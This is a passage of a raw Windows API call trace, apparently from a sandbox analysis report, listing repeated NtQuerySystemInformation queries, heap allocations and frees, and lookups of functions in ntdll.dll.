(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.404] GetProcessHeap () returned 0x2026c630000 [0274.404] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8060c0 [0274.404] GetProcessHeap () returned 0x2026c630000 [0274.404] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d79d0 [0274.404] GetProcessHeap () returned 0x2026c630000 [0274.404] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026c71c680 [0274.404] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71c180 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c6852c0 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884970 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c6856b0 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8076c0 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7990 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6852c0 | out: hHeap=0x2026c630000) returned 1 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026d2edcd0 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xf4) returned 0x2026d64f7d0 [0274.405] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd58 | out: phModule=0xc751dfdd58*=0x7ffcea380000) returned 1 [0274.405] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.405] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884d30 [0274.405] GetProcessHeap () returned 0x2026c630000 [0274.405] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d78e550 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805d50 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7a60 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x38) returned 0x2026d8843b0 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8843f0 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c180 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6856b0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8076c0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7990 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884970 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d64f7d0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e550 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805d50 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7a60 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884d30 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8843b0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c680 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8843f0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8060c0 | out: hHeap=0x2026c630000) returned 1 [0274.406] GetProcessHeap () returned 0x2026c630000 [0274.406] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d79d0 | out: hHeap=0x2026c630000) returned 1 [0274.407] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x2026d6d7a10 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806a60 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d79c0 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026c71c540 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71c2c0 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c6856b0 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884230 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c685170 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8076c0 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7780 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6856b0 | out: hHeap=0x2026c630000) returned 1 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026d2edcd0 [0274.407] GetProcessHeap () returned 0x2026c630000 [0274.407] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692cc0 [0274.408] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde38 | out: phModule=0xc751dfde38*=0x7ffcea380000) returned 1 [0274.408] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.408] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf70, ResultLength=0x0) returned 0x0 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884e30 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d78e550 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805b40 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7a90 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x40) returned 0x2026d78e6e0 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d884ab0 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c2c0 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c685170 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8076c0 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7780 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884230 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692cc0 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e550 | out: hHeap=0x2026c630000) returned 1 [0274.408] GetProcessHeap () returned 0x2026c630000 [0274.408] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805b40 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7a90 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884e30 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e6e0 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c540 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884ab0 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806a60 | out: hHeap=0x2026c630000) returned 1 [0274.409] GetProcessHeap () returned 0x2026c630000 [0274.409] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d79c0 | out: hHeap=0x2026c630000) returned 1 [0274.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0274.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0274.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x28, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x28, ResultLength=0x0) [0274.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x28, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x20, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x20, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.418] GetProcessHeap () returned 0x2026c630000 [0274.418] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807fb0 [0274.418] GetProcessHeap () returned 0x2026c630000 [0274.418] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7810 [0274.419] GetProcessHeap () returned 0x2026c630000 [0274.419] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x11c) returned 0x2026c63b550 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x128) returned 0x2026c63aaa0 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884670 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026c71ca40 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d808110 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7950 [0274.420] GetProcessHeap () returned 